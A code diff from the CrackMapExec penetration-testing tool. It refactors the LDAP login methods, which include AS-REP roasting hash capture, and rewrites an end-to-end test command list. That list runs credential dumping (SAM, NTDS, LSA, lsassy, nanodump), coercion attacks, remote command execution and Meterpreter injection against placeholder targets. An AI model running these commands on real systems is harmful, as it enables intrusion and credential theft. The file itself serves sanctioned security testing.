self.logger.extra['protocol'] = "LDAP"
#self.logger.info(self.endpoint)
# self.logger.info(self.endpoint)
return True
def kerberos_login(self, domain, username, password = '', ntlm_hash = '', aesKey = '', kdcHost = '', useCache = False):
def kerberos_login(self, domain, username, password='', ntlm_hash='', aesKey='', kdcHost='', useCache=False):
logging.getLogger("impacket").disabled = True
self.username = username
self.password = password
@ -326,22 +341,24 @@ class ldap(connection):
lmhash = ''
nthash = ''
self.username = username
#This checks to see if we didn't provide the LM Hash
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
self.hash = nthash
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(u'{}'.format(hash_tgt))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
hash_asreproast.write(hash_tgt + '\n')
return False
if not all('' == s for s in [self.nthash, password, aesKey]):
@ -352,21 +369,32 @@ class ldap(connection):
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
self.ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % self.target, self.baseDN)
self.ldapConnection.kerberosLogin(username, password, domain, self.lmhash, self.nthash,
aesKey, kdcHost=kdcHost, useCache=useCache)
ldap_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldap_url} - {self.baseDN} [1]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)
self.ldapConnection.kerberosLogin(
username,
password,
domain,
self.lmhash,
self.nthash,
aesKey,
kdcHost=kdcHost,
useCache=useCache
)
if self.username == '':
self.username = self.get_ldap_username()
self.check_if_admin()
out = u'{}\\{}{} {}'.format(domain,
self.username,
# Show what was used between cleartext, nthash, aesKey and ccache
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{}{} {}'.format(
domain,
self.username,
# Show what was used between cleartext, nthash, aesKey and ccache
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
@ -378,37 +406,51 @@ class ldap(connection):
return True
except SessionKeyDecryptionError:
# for PRE-AUTH account
self.logger.error(u'{}\\{}{} {}'.format(domain,
self.username,
" account vulnerable to asreproast attack",
""),
color='yellow')
self.logger.error(u'{}\\{}{} {}'.format(
domain,
self.username,
" account vulnerable to asreproast attack",
""),
color='yellow'
)
return False
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(error)),
color='magenta' if error in ldap_error_status else 'red')
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(error)),
color='magenta' if error in ldap_error_status else 'red'
)
return False
except (KeyError, KerberosException, OSError) as e:
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(e)),
color='red')
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(e)),
color='red'
)
return False
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
# Connect to LDAPS
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % self.target, self.baseDN)
self.ldapConnection.kerberosLogin(username, password, domain, self.lmhash, self.nthash,
aesKey, kdcHost=kdcHost, useCache=useCache)
ldaps_url = f"ldaps://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN} [2]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.kerberosLogin(
username,
password,
domain,
self.lmhash,
self.nthash,
aesKey,
kdcHost=kdcHost,
useCache=useCache
)
if self.username == '':
self.username = self.get_ldap_username()
@ -416,11 +458,12 @@ class ldap(connection):
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}{} {}'.format(domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{}{} {}'.format(
domain,
self.username,
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
if self.username == '':
self.username = self.get_ldap_username()
@ -428,9 +471,11 @@ class ldap(connection):
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{} {}'.format(domain,
self.username,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{} {}'.format(
domain,
self.username,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
@ -441,30 +486,34 @@ class ldap(connection):
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if error_code in ldap_error_status else 'red'
)
return False
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(error)),
color='magenta' if error in ldap_error_status else 'red')
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(error)),
color='magenta' if error in ldap_error_status else 'red'
)
return False
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if errorCode in ldap_error_status else 'red')
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if error_code in ldap_error_status else 'red'
)
return False
def plaintext_login(self, domain, username, password):
@ -473,25 +522,29 @@ class ldap(connection):
self.domain = domain
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(u'{}'.format(hash_tgt))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
hash_asreproast.write(hash_tgt + '\n')
return False
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
self.ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % self.target, self.baseDN)
ldap_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldap_url} - {self.baseDN} [3]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
@ -501,21 +554,24 @@ class ldap(connection):
add_user_bh(self.username, self.domain, self.logger, self.config)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
# Connect to LDAPS
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % self.target, self.baseDN)
ldaps_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN} [4]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
@ -525,68 +581,79 @@ class ldap(connection):
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
"Error connecting to the domain, are you sure LDAP service is running on the target ?"))
self.logger.error(u'{}\\{}:{} {} \nError: {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
"Error connecting to the domain, are you sure LDAP service is running on the target?",
e
))
return False
def hash_login(self, domain, username, ntlm_hash):
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
lmhash = ''
nthash = ''
lmhash = ""
nthash = ""
#This checks to see if we didn't provide the LM Hash
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
self.username = username
self.domain = domain
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(u'{}'.format(hash_tgt))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
hash_asreproast.write(hash_tgt + '\n')
return False
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
self.ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % self.target, self.baseDN)
ldaps_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN}")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
self.username,
self.nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
self.logger.success(out)
@ -599,15 +666,19 @@ class ldap(connection):
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % self.target, self.baseDN)
ldaps_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN}")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}:{} {}'.format(domain,
self.username,
self.nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
out = u'{}\\{}:{} {}'.format(
domain,
self.username,
self.nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
self.logger.success(out)
@ -617,25 +688,32 @@ class ldap(connection):
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
else:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[errorCode] if errorCode in ldap_error_status else ''),
color='magenta' if (errorCode in ldap_error_status and errorCode != 1) else 'red')
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
ldap_error_status[error_code] if error_code in ldap_error_status else ''),
color='magenta' if (error_code in ldap_error_status and error_code != 1) else 'red'
)
return False
except OSError as e:
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
self.username,
nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8,
"Error connecting to the domain, are you sure LDAP service is running on the target ?"))
self.logger.error(u'{}\\{}:{} {} \nError: {}'.format(
self.domain,
self.username,
self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8,
"Error connecting to the domain, are you sure LDAP service is running on the target?",
e
))
return False
def create_smbv1_conn(self):
@ -678,7 +756,6 @@ class ldap(connection):
self.logger.highlight('Domain SID {}'.format(self.sid_domain))
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
@ -692,20 +769,17 @@ class ldap(connection):
# loop over the count of small endians
sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)])
objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return objectSid
object_sid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return object_sid
except Exception:
pass
return sid
def check_if_admin(self):
# 1. get SID of the domaine
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes= ["objectSid"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
search_filter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
attributes = ["objectSid"]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
if resp and self.password != '' and self.username != '':
for attribute in resp[0][1]:
@ -714,9 +788,9 @@ class ldap(connection):
self.sid_domain = '-'.join(sid.split('-')[:-1])
# 2. get all group cn name
searchFilter = "(|(objectSid="+self.sid_domain+"-512)(objectSid="+self.sid_domain+"-544)(objectSid="+self.sid_domain+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes= ["distinguishedName"]
resp = self.search(searchFilter, attributes, sizeLimit=0)
search_filter = "(|(objectSid="+self.sid_domain+"-512)(objectSid="+self.sid_domain+"-544)(objectSid="+self.sid_domain+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
attributes = ["distinguishedName"]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
@ -725,10 +799,10 @@ class ldap(connection):
if str(attribute['type']) == 'distinguishedName':
answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute['vals'][0] + ")"))
# 3. get memeber of these groups
searchFilter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes= [""]
resp = self.search(searchFilter, attributes, sizeLimit=0)
# 3. get member of these groups
search_filter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
attributes = [""]
resp = self.search(search_filter, attributes, sizeLimit=0)
answers = []
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
@ -745,9 +819,11 @@ class ldap(connection):
try:
if self.ldapConnection:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
resp = self.ldapConnection.search(
searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit
)
return resp
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:

232
tests/e2e_commands.txt
View File

@ -1,65 +1,171 @@
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --shares
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --pass-pol
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --disks
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --groups
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --sessions
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --loggedon-users
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --users
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --computers
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --rid-brute
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --local-groups
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --local-auth
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --sam
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --ntds
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --lsa
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --dpapi
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -x whoami
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -X whoami
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -X whoami --obfs
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS --wmi "os get"
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M ntdsutil
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M nopac
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M enum_av
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M petitpotam
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M spooler
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M dfscoerce
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M shadowcoerce
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M enum_dns
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M gpp_autologin
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M gpp_password
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M lsassy
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M impersonate
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M install_elevated
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M ioxidresolver
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M MS17-010
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M ntlmv1
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M runasppl
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M uac
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M webdav
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M wifi
crackmapexec smb TARGET -u USER -p PASSWORD KERBEROS -M winscp
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --pass-pol
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --disks
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --groups
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --sessions
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --loggedon-users
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --users
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --computers
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --rid-brute
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --local-groups
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --gen-relay-list /tmp/relaylistOutputFilename.txt
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --local-auth
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --sam
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --ntds
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --lsa
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --dpapi
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc -o CLEANUP=True
# crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M empire_exec
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_av
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_dns
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_dns --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M enum_dns -o DOMAIN=google.com
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M firefox
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M get_netconnections
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_autologin
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M gpp_password
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M handlekatz
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M handlekatz --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M handlekatz -o HANDLEKATZ_EXE_NAME="hk.exe"
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M hash_spider
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M impersonate
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M install_elevated
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ioxidresolver
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_discover
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M keepass_trigger -o ACTION=CHECK USER=USERNAME
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M lsassy
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M masky
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ms17-010
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M msol
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M nopac
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntdsutil
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M ntlmv1
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M petitpotam
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M procdump
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test
# spider_plus takes a while to run, so it is commented out during normal testing
